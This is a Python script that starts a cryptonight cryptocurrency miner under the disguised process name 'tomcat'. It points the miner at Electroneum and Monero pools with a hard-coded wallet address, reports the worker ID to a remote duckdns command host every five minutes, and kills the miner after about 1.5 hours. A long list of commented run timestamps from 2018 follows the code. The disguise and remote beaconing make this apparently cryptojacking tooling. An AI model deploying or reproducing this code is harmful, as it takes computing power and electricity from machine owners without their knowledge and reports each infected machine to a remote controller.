import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:16:05.214799
#2018-02-17 17:05:05.919590
#2018-02-17 18:53:01.787001
#2018-02-17 20:43:04.374719
#2018-02-17 22:30:07.034950
#2018-02-18 00:13:06.396507
#2018-02-18 02:05:05.563946
#2018-02-18 03:52:06.078020
#2018-02-18 05:41:01.392238
#2018-02-18 07:33:01.662615
#2018-02-18 09:21:03.898109
#2018-02-18 11:07:03.367081
#2018-02-18 12:54:06.001488
#2018-02-18 14:39:07.255738
#2018-02-18 16:29:03.467751
#2018-02-18 18:18:02.224120
#2018-02-18 20:03:06.275633
#2018-02-18 21:50:07.063007
#2018-02-18 23:39:05.365411
#2018-02-19 01:25:01.906770
#2018-02-19 03:13:06.304316
#2018-02-19 04:58:03.891268
#2018-02-19 06:44:05.408282
#2018-02-19 08:34:04.069639
#2018-02-19 10:22:08.488953
#2018-02-19 12:10:10.384875
#2018-02-19 13:57:08.773786
#2018-02-19 15:46:02.107292
#2018-02-19 17:33:08.087228
#2018-02-19 19:21:01.224155
#2018-02-19 21:08:03.936869
#2018-02-19 22:54:06.361864
#2018-02-20 00:37:04.088130
#2018-02-20 02:26:01.363011
#2018-02-20 04:16:05.546980
#2018-02-20 06:01:06.363466
#2018-02-20 07:46:07.039201
#2018-02-20 09:31:01.481125
#2018-02-20 11:13:07.484035
#2018-02-20 12:59:08.658375
#2018-02-20 14:43:06.231593
#2018-02-20 16:29:06.263150
#2018-02-20 18:16:07.160569
#2018-02-20 20:06:08.822005
#2018-02-20 21:53:05.290625
#2018-02-20 23:35:09.546592
#2018-02-21 01:20:04.407825
#2018-02-21 03:08:01.770434
#2018-02-21 04:56:07.414542
#2018-02-21 06:44:06.451042
#2018-02-21 08:32:06.991668
#2018-02-21 10:17:06.026969
#2018-02-21 12:06:01.851065
#2018-02-21 13:56:03.042151
#2018-02-21 15:41:07.770315
#2018-02-21 17:32:06.689958
#2018-02-21 19:19:12.220569
#2018-02-21 21:07:01.493585
#2018-02-21 22:54:01.758313
#2018-02-22 00:40:10.173789
#2018-02-22 02:29:04.969991
#2018-02-22 04:16:04.950954
#2018-02-22 06:01:03.474416
#2018-02-22 07:47:04.725342
#2018-02-22 09:36:04.852880
#2018-02-22 11:21:06.805063
#2018-02-22 13:07:07.594496
#2018-02-22 14:57:08.196742
#2018-02-22 16:42:07.000280
#2018-02-22 18:28:07.100195
#2018-02-22 20:23:02.036008
#2018-02-22 22:08:08.391106
#2018-02-22 23:54:05.452377
#2018-02-23 01:42:05.580832
#2018-02-23 03:28:06.285511
#2018-02-23 05:14:06.286444
#2018-02-23 06:59:04.727215
#2018-02-23 08:49:02.163211
#2018-02-23 11:07:06.919851
#2018-02-23 13:00:14.044364
#2018-02-23 14:44:07.649885
#2018-02-23 16:32:08.313411
#2018-02-23 18:19:08.634500
#2018-02-23 20:05:08.052619
#2018-02-23 21:53:01.332190
#2018-02-23 23:42:08.446551
#2018-02-24 01:32:03.843201
#2018-02-24 03:22:05.626035
#2018-02-24 05:07:04.095285
#2018-02-24 06:56:01.315576
#2018-02-24 08:46:05.889341
#2018-02-24 10:46:06.927033
#2018-02-24 12:33:06.021583
#2018-02-24 14:22:07.386760
#2018-02-24 16:09:05.686454
#2018-02-24 18:00:10.440879
#2018-02-24 19:49:05.470758
#2018-02-24 21:34:01.845433
#2018-02-25 00:22:01.264906
#2018-02-25 03:29:06.875261
#2018-02-25 07:21:01.979594